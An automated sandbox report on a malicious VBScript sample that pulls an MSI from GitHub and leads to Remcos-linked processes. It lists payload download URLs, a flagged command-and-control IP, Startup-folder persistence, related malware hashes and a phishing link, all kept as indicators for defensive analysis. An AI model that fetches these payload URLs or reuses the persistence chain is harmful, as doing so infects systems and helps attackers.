                                                http://www.symauth.com/rpa00EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.zlib.net/DUpdwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, zlib1.dll.7.drfalse
                                                    high
                                                    https://github.com/Kroby5444/wscript.exe, 00000000.00000002.2180487920.000001BE6E1E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180154871.000001BE6E1E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.thawte.com/repository0WMSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drfalse
                                                        high
                                                        http://www.info-zip.org/EHttpSrv.exe, 00000006.00000002.2334264703.0000000002363000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.0000000005223000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.000000000233D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.0000000002536000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.00000000022E9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.00000000023AF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BB2000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.0000000002488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.vmware.com/0/EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.advancedinstaller.comMSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drfalse
                                                              high
                                                              http://nsis.sf.net/NSIS_ErrorErrorUpdwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drfalse
                                                                high
                                                                https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi0~DF3A55DD39FD7B01DD.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DF3C7138185BD29209.TMP.3.dr, ~DFF5932D2E29931496.TMP.3.dr, ~DFEAD6EDEC35001CF3.TMP.3.dr, ~DFD62908AF9B4414CC.TMP.3.drfalse
                                                                  high
                                                                  http://www.symauth.com/cps0(EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.mswscript.exe, 00000000.00000002.2180621569.000001BE6E5A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      185.199.108.133
                                                                      raw.githubusercontent.comNetherlands
                                                                      54113FASTLYUSfalse
                                                                      185.157.162.126
                                                                      unknownSweden
                                                                      197595OBE-EUROPEObenetworkEuropeSEtrue
                                                                      20.233.83.145
                                                                      github.comUnited States
                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1565487
                                                                      Start date and time:2024-11-30 01:24:06 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 31s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:32
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:secondaryTask.vbs
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@34/38@2/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 52%
                                                                      • Number of executed functions: 6
                                                                      • Number of non-executed functions: 332
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .vbs
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.198.119.143, 20.109.210.53, 13.85.23.206, 2.16.158.187, 2.16.158.179, 2.16.158.81, 2.16.158.90, 2.16.158.91, 2.16.158.83, 2.16.158.185, 2.16.158.82, 2.16.158.169
                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      TimeTypeDescription
                                                                      01:25:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RaftelibeGasrss.lnk
                                                                      01:25:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\checkdaemon_test.lnk
                                                                      19:25:10API Interceptor1x Sleep call for process: msiexec.exe modified
                                                                      19:25:59API Interceptor2x Sleep call for process: cmd.exe modified
                                                                      19:25:59API Interceptor2x Sleep call for process: EHttpSrv.exe modified
                                                                      19:26:07API Interceptor135938x Sleep call for process: WerFault.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      gaber.ps1Get hashmaliciousUnknownBrowse
                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                      185.157.162.126LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                        LauncherPred8.3.37Stablesetup.msiGet hashmaliciousRemcosBrowse
                                                                          Slf.msiGet hashmaliciousRemcosBrowse
                                                                            20.233.83.145LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                                                                file.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                  stub.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                    ww7Oxm9pwx.exeGet hashmaliciousUnknownBrowse
                                                                                      qbVjvy9gv2.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                        TXj1ICMUqd.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                          cY6HT7CeBF.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                            ww7Oxm9pwx.exeGet hashmaliciousUnknownBrowse
                                                                                              lka01EskGw.exeGet hashmaliciousUnknownBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                github.comLauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                • 20.233.83.145
                                                                                                stub.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                • 20.233.83.145
                                                                                                ww7Oxm9pwx.exeGet hashmaliciousUnknownBrowse
                                                                                                • 20.233.83.145
                                                                                                qbVjvy9gv2.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                • 20.233.83.145
                                                                                                9arEd0o4IZ.exeGet hashmaliciousUnknownBrowse
                                                                                                • 20.233.83.146
                                                                                                IwSa5fjMWm.exeGet hashmaliciousUnknownBrowse
                                                                                                • 20.233.83.146
                                                                                                051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                                                                • 20.233.83.146
                                                                                                TXj1ICMUqd.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                • 20.233.83.145
                                                                                                bg.microsoft.map.fastly.netphish_alert_iocp_v1.4.48 (80).emlGet hashmaliciousInvoiceScamBrowse
                                                                                                • 199.232.210.172
                                                                                                file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, NymaimBrowse
                                                                                                • 199.232.214.172
                                                                                                https://e.letscompress.online/update.txtGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                • 199.232.210.172
                                                                                                stub.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                • 199.232.210.172
                                                                                                051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                zBsyPM1YmX.exeGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                SwiftCopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.210.172
                                                                                                11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 199.232.214.172
                                                                                                INV_642421346_50136253995_SIMPLE_SK#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 199.232.214.172
                                                                                                raw.githubusercontent.comLauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                • 185.199.108.133
                                                                                                weWHT1b7JO.dllGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                • 185.199.111.133
                                                                                                file.exeGet hashmaliciousStealeriumBrowse
                                                                                                • 185.199.110.133
                                                                                                file.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                • 185.199.109.133
                                                                                                file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                • 185.199.108.133
                                                                                                file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                • 185.199.110.133
                                                                                                stub.exeGet hashmaliciousStealeriumBrowse
                                                                                                • 185.199.108.133
                                                                                                pPLD6OSn7O.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                stub.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                • 185.199.110.133
                                                                                                s-part-0035.t-0009.t-msedge.netLauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                OBE-EUROPEObenetworkEuropeSELauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                • 185.157.162.126
                                                                                                la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                • 193.183.116.8
                                                                                                LauncherPred8.3.37Stablesetup.msiGet hashmaliciousRemcosBrowse
                                                                                                • 185.157.162.126
                                                                                                Slf.msiGet hashmaliciousRemcosBrowse
                                                                                                • 185.157.162.126
                                                                                                HSG-IVN-2093456FIN.exeGet hashmaliciousRemcosBrowse
                                                                                                • 185.157.163.135
                                                                                                Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                                                • 45.148.17.56
                                                                                                nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                • 185.242.230.228
                                                                                                ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 193.187.91.212
                                                                                                Order_MG2027176.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 185.157.163.135
                                                                                                Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                • 193.187.91.214
                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSLauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                • 52.168.117.173
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 13.107.246.63
                                                                                                https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.47.75.220
                                                                                                FASTLYUSLauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                • 185.199.108.133
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.65.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.1.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.65.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.1.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.65.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.1.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.65.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.1.91
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 151.101.129.91
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                28a2c9bd18a11de089ef85a160da29e4LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                https://noisefreqs.com/Ray-verify.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                http://trk.allsportspass.clubGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 185.199.108.133
                                                                                                • 20.233.83.145
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\EHttpSrv.exeLauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                  LauncherPred8.3.37Stablesetup.msiGet hashmaliciousRemcosBrowse
                                                                                                    Slf.msiGet hashmaliciousRemcosBrowse
                                                                                                      ystCwvqbxR.exeGet hashmaliciousLummaC Stealer, RedLine, SectopRATBrowse
                                                                                                        D3VUOgNs63.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dllLauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2706
                                                                                                            Entropy (8bit):5.45485237389586
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:7TYTQ9hsp4lZ/Q7tOLPtmdZhLdZjdZZKl33bwHeKq3vcRgu:7TYT2hQ4lZ/omOhzbZsRJcKu
                                                                                                            MD5:4ACB760D87248C7FC602D3CE1776C449
                                                                                                            SHA1:12C002310974CD191EC48D08653BDF02B4E1678C
                                                                                                            SHA-256:55E30AA80544F0D1688C8D68EBF3B7FBE0ECC7F0E933DA21BE37A97FB5450611
                                                                                                            SHA-512:DB1DEA49BF9584A9360E140453E30042234206C97877A6661C5CABE3F4D41EB91EAA952F76DB077B5C0881100B3EF87B2524A3A40604AD341016B3C2FF414C13
                                                                                                            Malicious:false
                                                                                                            Preview:...@IXOS.@.....@5.}Y.@.....@.....@.....@.....@.....@......&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}..dermys..Slf.msi.@.....@.....@.....@........&.{02DCC2F2-67E6-46B0-92E0-2CB394AB055F}.....@.....@.....@.....@.......@.....@.....@.......@......dermys......Rollback..Annulation de l'action: ....RollbackCleanup%.Effacement des fichiers de sauvegarde..Fichier: [1]....ProcessComponents9.M.i.s.e. ... .j.o.u.r. .d.e.s. .i.n.f.o.r.m.a.t.i.o.n. .d.'.e.n.r.e.g.i.s.t.r.e.m.e.n.t. .d.u. .c.o.m.p.o.s.a.n.t...&.{0E0C50F8-B210-4B4D-91B3-D1FB7FE78CFA}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{BA5264B4-F3AE-4F52-99B5-3968C5A81E6A}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{6B83B1C9-08BB-4AEA-A6A8-8797A2558FDB}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{F74533CE-84F1-400D-ABB3-76E2590644A5}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{80922E60-CA5C-47B6-8B4C-D47FFA72F238}&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}.@......&.{6D606797-1F46-48D5-926D-D91FB8EFECB0}&.{BB2F3E18-3F04-450F-
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20680
                                                                                                            Entropy (8bit):6.088615575328619
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:Damtvzlx5v02RIDauMTnxOn6sGCYJLW7wycJbi6jc:D7Jv0qpukxO6s6Lhbimc
                                                                                                            MD5:9329BA45C8B97485926A171E34C2ABB8
                                                                                                            SHA1:20118BC0432B4E8B3660A4B038B20CA28F721E5C
                                                                                                            SHA-256:EFFA6FCB8759375B4089CCF61202A5C63243F4102872E64E3EB0A1BDC2727659
                                                                                                            SHA-512:0AF06B5495142BA0632A46BE0778A7BD3D507E9848B3159436AA504536919ABBCACD8B740EF4B591296E86604B49E0642FEE2C273A45E44B41A80F91A1D52ACC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: LauncherPred8.3.389 stablesetup.msi, Detection: malicious, Browse
                                                                                                            • Filename: LauncherPred8.3.37Stablesetup.msi, Detection: malicious, Browse
                                                                                                            • Filename: Slf.msi, Detection: malicious, Browse
                                                                                                            • Filename: ystCwvqbxR.exe, Detection: malicious, Browse
                                                                                                            • Filename: D3VUOgNs63.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3.u....3......3......3......3......3..3.3......3......3......3.Rich.3.................PE..L......K.....................................0....@..........................`......_A.......................................6..d....P...............6..............P1...............................4..@............0..(............................text............................... ..`.rdata..6....0......................@..@.data........@.......(..............@....rsrc........P.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (504), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1870
                                                                                                            Entropy (8bit):5.392327712070946
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:3SlK+hig4FB09kkK0hpzWU09kkKqYhzVC09kkK0FFzY:ClthaTXkHnCUXk8hgXkFj8
                                                                                                            MD5:D34B3DA03C59F38A510EAA8CCC151EC7
                                                                                                            SHA1:41B978588A9902F5E14B2B693973CB210ED900B2
                                                                                                            SHA-256:A50941352CB9D8F7BA6FBF7DB5C8AF95FB5AB76FC5D60CFD0984E558678908CC
                                                                                                            SHA-512:231A97761D652A0FC133B930ABBA07D456BA6CD70703A632FD7292F6EE00E50EF28562159E54ACC3FC6CC118F766EA3F2F8392579AE31CC9C0C1C0DD761D36F7
                                                                                                            Malicious:false
